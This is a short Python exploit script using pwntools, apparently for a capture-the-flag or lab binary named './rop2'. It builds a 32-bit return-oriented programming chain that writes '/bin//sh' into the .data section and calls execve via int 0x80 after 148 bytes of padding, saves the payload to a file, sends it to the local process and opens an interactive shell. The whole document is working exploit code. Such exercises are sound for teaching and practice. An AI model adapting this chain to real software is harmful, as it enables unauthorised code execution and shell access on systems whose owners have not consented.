#!/usr/bin/python

from pwn import *
from struct import pack
# Padding goes her
p = ''

p += pack('<I', 0x0807296b) # pop edx ; ret
p += pack('<I', 0x080de060) # @ .data
p += pack('<I', 0x080ac946) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x08056de5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0807296b) # pop edx ; ret
p += pack('<I', 0x080de064) # @ .data + 4
p += pack('<I', 0x080ac946) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x08056de5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0807296b) # pop edx ; ret
p += pack('<I', 0x080de068) # @ .data + 8
p += pack('<I', 0x080563a0) # xor eax, eax ; ret
p += pack('<I', 0x08056de5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481d1) # pop ebx ; ret
p += pack('<I', 0x080de060) # @ .data
p += pack('<I', 0x08072992) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080de068) # @ .data + 8
p += pack('<I', 0x080de060) # padding without overwrite ebx
p += pack('<I', 0x0807296b) # pop edx ; ret
p += pack('<I', 0x080de068) # @ .data + 8
p += pack('<I', 0x080563a0) # xor eax, eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x0807fdfa) # inc eax ; ret
p += pack('<I', 0x08049643) # int 0x80
def main():
    # start the process
    pro = process("./rop2")

    # Craft the payload
    payload = "A" * 148 
    payload += p
    payload = payload.ljust(1000,"\x00")

    # print the process id
    raw_input(str(pro.proc.pid))

    f = open("shellcode2", "w")
    f.write(payload)
    f.close()

    # send the payload
    pro.send(payload)

    # transfer interaction to the user
    pro.interactive()

if __name__ == '__main__':
    main()